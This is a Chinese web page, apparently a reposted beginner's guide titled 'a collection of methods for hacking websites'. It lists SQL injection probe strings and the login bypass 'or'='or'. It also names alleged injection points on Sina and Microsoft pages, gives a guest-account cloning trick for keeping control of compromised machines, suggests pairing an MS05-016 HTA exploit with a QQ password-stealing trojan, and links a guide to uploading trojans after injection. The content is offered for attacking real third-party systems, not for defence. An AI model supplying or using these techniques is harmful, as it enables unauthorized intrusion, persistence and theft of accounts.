您的位置首页百科知识

入侵网站的方法大集合(适合新手) -电脑资料

 入侵网站的方法大集合(适合新手) -电脑资料

常研究网站入侵,

大多现在比较少了。但有些仍管用。适合新手,老鸟略过。。

有些也可回味下。。

1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络

2.搜索栏里输入

关键字%’and 1=1 and ’%’=’

关键字%’and 1=2 and ’%’=’

比较不同处 可以作为注入的特征字符

3.登陆框用户名和密码输入’or’=’or’ 漏洞很老但是现在很是遍地都是

4.我们先到www.google.com底下搜索一下co net mib ver 1.0

密码帐号都是 ’or’=’or’

5.挂马代码

6.http://www.wyyfk.com/24小时挂QQ工具 (这个暂时不能用了)

7.开启regedt32的sam的管理员权限 检查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理员和guest的f键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,

net localgroup administrators还是可以看出guest是管理员来

7.只要敢想,新浪也可入侵 注入点

http://igame.sina.com.cn/plaza/event/new/crnt_event_vIEw.asp?event_id=59

微软 注入点

http://www.microsoft.com/library/toolbar/3.0/search.aspx?vIEw=en-us&charset=iso-8859-1&qu=

(这是新浪的ASP程序)

8.ms05016攻击工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上QQ大盗木马

9.有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器

sql注入后,如何上传木马,

文章地址http://hack123.home4u.china.com/0601.htm

10.QQ强制聊天代码

qq.com/msgrd?v=1&uin=" target=_blank>http://wpa.QQ.com/msgrd?v=1&uin=对方的QQ号&site=ioshenmue&menu=yes

使用方法:把代码中的红色的“********”星号换成你想与其聊天的qq号后复 制到浏览器的地址栏处即可,

入侵网站的方法大集合(适合新手)https://www.unjs.com消息 下一页